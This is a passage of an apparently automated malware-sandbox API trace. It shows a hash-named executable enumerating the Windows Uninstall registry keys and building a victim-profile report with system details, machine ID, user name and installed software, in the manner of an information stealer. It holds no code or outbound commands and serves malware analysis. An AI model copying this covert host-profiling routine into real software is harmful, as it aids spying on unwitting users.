9.0.30729.6161 9.0.30729.6161", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n" [0208.113] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.113] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x1f, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{B175520C-86A2-35A7-8619-86DC379688B9}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.113] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}") returned 94 [0208.113] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.113] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpcbData=0x19ce18*=0x3e) returned 0x0 [0208.113] lstrlenA (lpString="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030") returned 61 [0208.113] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n", lpString2="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030" [0208.113] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="11.0.61030", lpcbData=0x19ce18*=0xb) returned 0x0 [0208.113] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 " [0208.113] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 ", lpString2="11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030" [0208.113] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\n" [0208.113] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.113] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x20, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.113] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}") returned 94 [0208.113] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.114] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpcbData=0x19ce18*=0x3b) returned 0x0 [0208.114] lstrlenA (lpString="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030") returned 58 [0208.114] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual 